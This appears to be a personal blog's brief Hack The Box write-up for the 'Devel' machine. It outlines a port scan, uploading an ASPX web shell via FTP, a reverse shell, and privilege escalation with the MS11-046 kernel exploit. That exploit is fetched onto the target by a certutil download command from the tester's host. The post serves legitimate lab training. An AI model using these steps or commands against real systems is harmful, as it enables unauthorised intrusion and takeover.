Steven Meow's Blog 🐱

Devel (Hack The Box Writeup)

URL : https://app.hackthebox.eu/machines/3
IP : 10.129.208.183

Contents

Information Gathering
FTP Services
Web Shell
Reverse shell
Privilege Escalation

Information Gathering

Port Scan
- rustscan -a 10.129.208.183 -r 1-65535
- 21 : FTP
- 80 : Web

FTP Services

Try to connect to ftp
Use Aspx Web shell
- https://raw.githubusercontent.com/SecWiki/WebShell-2/master/Aspx/awen%20asp.net%20webshell.aspx

Web Shell

Install Reverse Shell
- ASPX Reverse shell
- https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

Reverse shell

Check System Info
- - user : iis apppool\web
- - System : Win 7 x64 6.1.7600 N/A Build 7600
- - Check Environment Variable

Privilege Escalation

With OS Version
Exploit : MS11-046 Kernel Exploits
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046
Download Exploit file to target machine
- certutil -urlcache -f http://10.10.16.35:8000/ms11-046.exe ms11-046.exe
Run binary
- Get System
User Flag
Root Flag

8 9 月, 2021

steven

Hack The Box, 滲透測試

發表迴響取消回覆